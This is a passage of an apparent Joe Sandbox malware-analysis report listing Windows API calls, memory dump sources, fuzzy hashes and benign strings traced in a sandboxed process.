                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1516B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D1516AF1,?,?,?,00007FF7D153EA0F,?,?,?,00007FF7D153E925), ref: 00007FF7D1516B39
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1516B30: RtlFreeHeap.NTDLL ref: 00007FF7D1516B4D
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1516B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D1516AF1,?,?,?,00007FF7D153EA0F,?,?,?,00007FF7D153E925), ref: 00007FF7D1516B59
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D153EA0F,?,?,?,00007FF7D153E925,?,?,?,?,00007FF7D151B9B1), ref: 00007FF7D1516B03
                                                                                                                                                                                                                                                                                                                                                                                                                                        • RtlFreeHeap.NTDLL ref: 00007FF7D1516B17
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Heap$Process$Free$towupper$CurrentDirectoryEnvironmentFullNamePathStringsiswalpha
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3512109576-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 8f4b1d5ce50235cd8df95cbb63a3d342c9287a43de6d3e78912ffcd14c768081
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9E216B62A09A8B86FB05EB65D4142BCBBA0FB59B44FD48036CA4F47271DEBCA445C370
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D151AF82), ref: 00007FF7D151B6D0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D151AF82), ref: 00007FF7D151B6E7
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D151AF82), ref: 00007FF7D151B701
                                                                                                                                                                                                                                                                                                                                                                                                                                        • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D151AF82), ref: 00007FF7D151B715
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Heap$Process$AllocSize
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2549470565-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 1975c8fa02f60c8097d6d8fc63ad62c8c6dc35d6443467d08fd32a81c75e7103
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 10210E22A0964B86FF55AB11E45007CF6A1FB48B80BD99472DA4F03770DFBCE585C720
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7D152507A), ref: 00007FF7D153D01C
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7D152507A), ref: 00007FF7D153D033
                                                                                                                                                                                                                                                                                                                                                                                                                                        • FillConsoleOutputAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7D152507A), ref: 00007FF7D153D06D
                                                                                                                                                                                                                                                                                                                                                                                                                                        • SetConsoleTextAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7D152507A), ref: 00007FF7D153D07F
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Console$Attribute$BufferFillHandleInfoOutputScreenText
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1033415088-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1521EA0: wcschr.MSVCRT(?,?,?,00007FF7D151286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF7D1540D54), ref: 00007FF7D1521EB3
                                                                                                                                                                                                                                                                                                                                                                                                                                        • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7D1515A2E
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _open_osfhandle.MSVCRT ref: 00007FF7D1515A4F
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00008000,?,00000001,00007FF7D151260D), ref: 00007FF7D15337AA
                                                                                                                                                                                                                                                                                                                                                                                                                                        • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF7D15337D2
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: CloseCreateErrorFileHandleLast_open_osfhandlewcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 22757656-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF7D1535433,?,?,?,00007FF7D15369B8,?,?,?,?,?,00007FF7D1528C39), ref: 00007FF7D15356C5
                                                                                                                                                                                                                                                                                                                                                                                                                                        • RtlFreeHeap.NTDLL ref: 00007FF7D15356D9
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF7D1535433,?,?,?,00007FF7D15369B8,?,?,?,?,?,00007FF7D1528C39), ref: 00007FF7D15356FD
                                                                                                                                                                                                                                                                                                                                                                                                                                        • RtlFreeHeap.NTDLL ref: 00007FF7D1535711
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Heap$FreeProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3859560861-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 140117192-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 2f4131741d9d6632e511b7eb769d28a46f522d1e99eacb17b21fa6a77158af08
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9D219236A18B4AC5F740AB05E884369B3A4FB95754FE00036EA8E42774DFBDE444C720
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D1518798), ref: 00007FF7D1524AD6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D1518798), ref: 00007FF7D1524AEF
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1524A14: GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF7D15249F1), ref: 00007FF7D1524A28
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1524A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7D15249F1), ref: 00007FF7D1524A66
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1524A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7D15249F1), ref: 00007FF7D1524A7D
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1524A14: memmove.MSVCRT(?,?,00000000,00007FF7D15249F1), ref: 00007FF7D1524A9A
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1524A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7D15249F1), ref: 00007FF7D1524AA2
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D1518798), ref: 00007FF7D152EE64
                                                                                                                                                                                                                                                                                                                                                                                                                                        • RtlFreeHeap.NTDLL ref: 00007FF7D152EE78
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Heap$Process$AllocEnvironmentFreeStrings$memmove
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2759988882-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 7a5c712774281da9825380d2707369d566eac4a7ff1e30a642231065effaaf4a
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: aeafd825acc0c2459856bf1129d0d12cf226c095d70a8de63a7ba88b8fc572ff
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7a5c712774281da9825380d2707369d566eac4a7ff1e30a642231065effaaf4a
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2CF03721A09A4B8AFF44AB66940417CE9D1EF8EB41BD88075C94F82361EE7CA5448220
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: ConsoleMode_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1606018815-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15206C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7D151B4DB), ref: 00007FF7D15206D6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15206C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7D151B4DB), ref: 00007FF7D15206F0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15206C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7D151B4DB), ref: 00007FF7D152074D
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15206C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7D151B4DB), ref: 00007FF7D1520762
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151EF40: iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF7D151E626,?,?,00000000,00007FF7D1521F69), ref: 00007FF7D151F000
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151EF40: wcschr.MSVCRT(?,?,00000000,00007FF7D1521F69,?,?,?,?,?,?,?,00007FF7D151286E,00000000,00000000,00000000,00000000), ref: 00007FF7D151F031
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151EF40: iswdigit.MSVCRT(?,?,00000000,00007FF7D1521F69,?,?,?,?,?,?,?,00007FF7D151286E,00000000,00000000,00000000,00000000), ref: 00007FF7D151F0D6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • longjmp.MSVCRT ref: 00007FF7D152CCBC
                                                                                                                                                                                                                                                                                                                                                                                                                                        • longjmp.MSVCRT(?,?,00000000,00007FF7D1521F69,?,?,?,?,?,?,?,00007FF7D151286E,00000000,00000000,00000000,00000000), ref: 00007FF7D152CCE0
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
Memory Dump Source
• Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Heap$AllocProcesslongjmp$iswdigitiswspacewcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: GeToken: (%x) '%s'
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3282654869-1994581435
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D151B9A1,?,?,?,?,00007FF7D151D81A), ref: 00007FF7D151CDA6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D151B9A1,?,?,?,?,00007FF7D151D81A), ref: 00007FF7D151CDBD
                                                                                                                                                                                                                                                                                                                                                                                                                                        • wcschr.MSVCRT(?,00000000,00000000,00000000,00000001,0000000A,?,00007FF7D153827A), ref: 00007FF7D15411DC
                                                                                                                                                                                                                                                                                                                                                                                                                                        • memmove.MSVCRT(?,00000000,00000000,00000000,00000001,0000000A,?,00007FF7D153827A), ref: 00007FF7D1541277
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
Memory Dump Source
• Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Heap$AllocProcessmemmovewcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: &()[]{}^=;!%'+,`~
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1135967885-381716982
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
Memory Dump Source
• Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: memmovewcsncmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: 0123456789
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3879766669-2793719750
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7D15397D0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7D151D46E
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7D151D485
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151D3F0: wcschr.MSVCRT ref: 00007FF7D151D4EE
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151D3F0: iswspace.MSVCRT ref: 00007FF7D151D54D
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151D3F0: wcschr.MSVCRT ref: 00007FF7D151D569
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151D3F0: wcschr.MSVCRT ref: 00007FF7D151D58C
                                                                                                                                                                                                                                                                                                                                                                                                                                        • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7D15398D7
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: Software\Classes
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2714550308-1656466771
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7D153A0FC
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7D151D46E
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7D151D485
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151D3F0: wcschr.MSVCRT ref: 00007FF7D151D4EE
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151D3F0: iswspace.MSVCRT ref: 00007FF7D151D54D
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151D3F0: wcschr.MSVCRT ref: 00007FF7D151D569
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151D3F0: wcschr.MSVCRT ref: 00007FF7D151D58C
